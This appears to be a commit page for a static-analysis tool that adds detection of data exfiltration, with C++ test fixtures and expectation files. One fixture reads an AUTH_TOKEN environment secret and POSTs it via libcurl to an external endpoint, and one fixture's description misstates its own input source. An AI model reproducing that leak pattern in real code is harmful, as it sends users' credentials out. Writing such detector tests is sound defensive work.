Added Cap::DATA_EXFIL and taint fp and fn fixes on real repos (#59)

* feat: Enhance data exfiltration detection with source sensitivity gating for cookies and headers

* feat: Implement cross-file data exfiltration detection with parameter-specific gate filters

* feat: Add calibration tests and refine DATA_EXFIL severity scoring logic

* feat: Introduce per-detector configuration for data exfiltration suppression

* feat: Enhance DATA_EXFIL findings with destination field tracking in diagnostics and SARIF output

* feat: Add tainted body and URL handling for data exfiltration detection

* feat: Add integration tests and fixtures for DATA_EXFIL and SSRF detection in Go

* feat: Add Java integration tests and fixtures for DATA_EXFIL detection across multiple HTTP clients

* feat: Add synthetic externals handling for closure-captured variables in SSA

* feat: Implement closure-based suppression for resource leak findings

* feat: Add regression guards for shell-injection and taint propagation in for-of destructure patterns

* feat: Implement constructor cap narrowing for data exfiltration detection in HTTP request builders

* feat: Add gated sinks for data exfiltration detection in C and C++ using curl_easy_setopt

* feat: Implement DATA_EXFIL cap parity for backwards analysis and add integration tests

* feat: Add data exfiltration sinks for various languages and enhance documentation

* refactor: Simplify formatting and improve readability in various files

* refactor: Improve readability by simplifying conditional statements and adding clippy linting

* docs: Update CHANGELOG and comments for data exfiltration features and configuration

* docs: Clarify configuration instructions for data exfiltration trusted destinations

* docs: Enhance comments for evidence routing logic in data exfiltration
This commit is contained in:
Eli Peter 2026-05-01 10:59:52 -04:00 committed by GitHub
parent a438886217
commit 58f1794a4e
No known key found for this signature in database
GPG key ID: B5690EEEBB952194
189 changed files with 8421 additions and 383 deletions

View file

@ -0,0 +1,13 @@
#include <curl/curl.h>
#include <cstdlib>
void leak_env() {
const char *token = std::getenv("AUTH_TOKEN");
if (!token) return;
CURL *curl = curl_easy_init();
curl_easy_setopt(curl, CURLOPT_URL, "https://analytics.internal/track");
curl_easy_setopt(curl, CURLOPT_POSTFIELDS, token);
curl_easy_perform(curl);
curl_easy_cleanup(curl);
}

View file

@ -0,0 +1,13 @@
{
"description": "curl_easy_setopt(handle, CURLOPT_POSTFIELDS, body) gated sink in C++: same gating model as the C fixture. The activation arg (CURLOPT_POSTFIELDS) is matched as a preprocessor-macro identifier via the macro-arg fallback, so DATA_EXFIL fires only at the body-binding setopt call. std::getenv is Sensitivity::Sensitive so DATA_EXFIL must fire.",
"tags": ["taint", "data-exfil", "curl", "gated-sink", "sensitivity-gate", "macro-activation"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_match": true,
"line_range": [4, 12],
"notes": "std::getenv(\"AUTH_TOKEN\") → SourceKind::EnvironmentConfig → Sensitivity::Sensitive — DATA_EXFIL fires on the curl_easy_setopt body-binding call gated by CURLOPT_POSTFIELDS."
}
]
}

View file

@ -0,0 +1,13 @@
#include <curl/curl.h>
#include <cstdio>
void forward_stdin() {
char input[256];
if (!fgets(input, sizeof(input), stdin)) return;
CURL *curl = curl_easy_init();
curl_easy_setopt(curl, CURLOPT_URL, "https://telemetry.internal/forward");
curl_easy_setopt(curl, CURLOPT_POSTFIELDS, input);
curl_easy_perform(curl);
curl_easy_cleanup(curl);
}

View file

@ -0,0 +1,13 @@
{
"description": "curl_easy_setopt CURLOPT_POSTFIELDS body-binding with a plain user-input source (std::getline from std::cin). DATA_EXFIL must NOT fire: the body source is Sensitivity::Plain (raw user input) and the source-sensitivity gate suppresses Plain-tier sources for Cap::DATA_EXFIL. Pairs with data_exfil_curl_postfields.cpp to assert per-tier routing for C++.",
"tags": ["taint", "data-exfil", "curl", "gated-sink", "sensitivity-gate", "cap-attribution"],
"modes": ["full"],
"expected": [
{
"rule_id": "taint-data-exfiltration",
"must_not_match": true,
"line_range": [4, 12],
"notes": "Body source is plain user input (std::getline from std::cin → Sensitivity::Plain). DATA_EXFIL fires only on Sensitive-tier sources — plain user input echoed into a request body is not data exfiltration."
}
]
}